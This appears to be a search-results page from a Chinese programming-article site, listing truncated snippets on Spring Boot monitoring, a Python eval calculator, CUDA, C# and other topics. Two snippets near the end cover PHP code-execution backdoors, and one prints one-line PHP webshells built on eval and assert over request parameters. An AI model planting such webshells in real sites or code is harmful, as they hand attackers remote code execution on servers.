码迷,mamicode.com
首页 >  
搜索关键字:eva    ( 1440个结果
spring boot监控之prometheus配置
1,spring boot工程引入jar包 compile 'org.springframework.boot:spring-boot-starter-actuator' compile 'io.micrometer:micrometer-core:1.3.5' compile 'io.microm ...
分类:编程语言   时间:2020-03-06 10:59:42    阅读次数:66
计算器 暂时没解决小数问题
1 import re 2 3 num_one = '(98798465*5465+4654-5464*45616846+84654)' 4 print(eval(num_one)) 5 6 total = 0 7 print(num_one) 8 while True: 9 try: 10 a = ...
分类:其他好文   时间:2020-03-04 21:02:06    阅读次数:57
Linux 服务器性能测试报告-sysbench命令实践
Linux 服务器性能测试报告 我们使用linux 工具sysbench 来测试linux服务器性能,目前在Centos上进行操作 Install sysbench check it CPU Benchmark(运行性能) 测试CPU运行性能 测试结果 记录数据 total time taken b ...
分类:系统相关   时间:2020-03-03 16:20:52    阅读次数:97
cuda和NVDIA驱动版本不一致导致cuda不可用问题/require virtual c++ 14问题
cuda和NVDIA驱动版本不一致导致cuda不可用问题/require virtual c++ 14问题 待办桌面鼠标右键查看NVIDIA版本,然后查看安装的cuda版本(conda list 或者 pycharm查看都可以)cuda版本和NVIDIA版本对照表https://blog.csdn.... ...
分类:编程语言   时间:2020-03-02 00:53:15    阅读次数:234
matplotlib.pyplot库函数关于坐标轴显示的支持
matplotlib.pyplot库函数关于坐标轴显示的支持 https://blog.csdn.net/Stark_595/article/details/80787005?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source ...
分类:其他好文   时间:2020-02-29 22:33:22    阅读次数:130
C# GroupBy的使用
var skill = query.GroupBy(i=>i.SkillTypeId) .Select(i => new { skillType=i.key, skill=i.Select(s=>new{ i.Id, i.Level, i.IsEquiped, }) 输出结果 { "skillTyp ...
分类:Windows程序   时间:2020-02-29 20:52:05    阅读次数:92
js左右选项移动
<!--网页代码--><div class="modal" id="modal-primary7"> <div class="modal-dialog"> <div class="modal-content"> <input type="hidden" id="modal7_id"> <div cl ...
分类:移动开发   时间:2020-02-28 14:21:22    阅读次数:96
xcode
真是服了mac的操作了,app store下载不了xcode,os版本太低了,真是够了,就不能多提供一些低版本的吗? 自己找大神们收集的版本https://blog.csdn.net/abc2912333/article/details/101251322?depth_1-utm_source=di ...
分类:其他好文   时间:2020-02-26 16:50:06    阅读次数:50
PHP常见代码执行后门函数
PHP常见代码执行后门函数 代码执行: 应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。 常见php代码执行函数介绍 常用执行代码函数 1、eval(): eval函数将接受的字符串当做代码执行 2、 assert(): ...
分类:Web程序   时间:2020-02-25 10:01:00    阅读次数:142
一句话木马
一句话木马书写:为什么是一句话木马,因为他可以通过函数接收指定的参数来让我们的操作系统执行指定的命令 1.eval函数 <?php eval($_REQUEST['a]);?> 2.assert函数 <?php assert($_REQUEST["a"]); ?> 3.匿名方法构造 <?php fu ...
分类:其他好文   时间:2020-02-23 11:47:13    阅读次数:106
1440条   上一页 1 ... 22 23 24 25 26 ... 144 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!